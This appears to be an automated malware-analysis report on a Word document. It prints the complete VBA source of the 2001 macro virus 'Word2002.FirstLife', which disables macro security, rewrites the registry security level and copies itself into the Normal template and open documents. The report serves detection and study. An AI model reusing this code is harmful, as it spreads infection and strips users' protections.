Verdict: MALICIOUS
Risk Score: 180
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The script attempts to disable macro security and inject code into the Normal template, indicating an attempt at persistence. The ClamAV detections 'Win.Trojan.Psycho-3' and 'Win.Trojan.wmvg-1' further support its malicious nature.
Heuristics 3
- ClamAV: Win.Trojan.Psycho-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Psycho-3
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2219 bytes |

SHA-256: c8a371e644501e213166f08cb52eac9816b0624be6fd667ef8ca8a1654c9a528
Detection: ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
On Error Resume Next
'Word2002.FirstLife
Options.ConfirmConversions = (1 - 1)
Options.SaveNormalPrompt = (1 - 1)
If Application.Version = "10.0" Then
MsgBox "10"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
Application.AutomationSecurity = msoAutomationSecurityForceDisable
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
End If
End If
If Application.Version = "9.0" Then
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
CommandBars("Tools").Controls("Macro").Enabled = False
End If
End If
TD = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
If NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(3, 1) <> "'Word2002.FirstLife" Then
Set NT = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
NT.DeleteLines 1, NT.CountOfLines
NT.AddFromString TD
NT.ReplaceLine 1, "Sub Document_Close()"
End If
If ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(3, 1) <> "'Word2002.FirstLife" Then
Set VA = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
VA.DeleteLines 1, VA.CountOfLines
VA.AddFromString TD
VA.ReplaceLine 1, "Sub Document_Open()"
End If
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
' Word2002.FirstLife by ULTRAS [MATRiX]
' The first virus for Word 2002!
' Date: mar 21th 2001
' MATRiX TeAm:
' ANAKToS, Del_Armg0, NBK, mort, SnakeByte, pointbat, ULTRAS
' new technology, new vx power...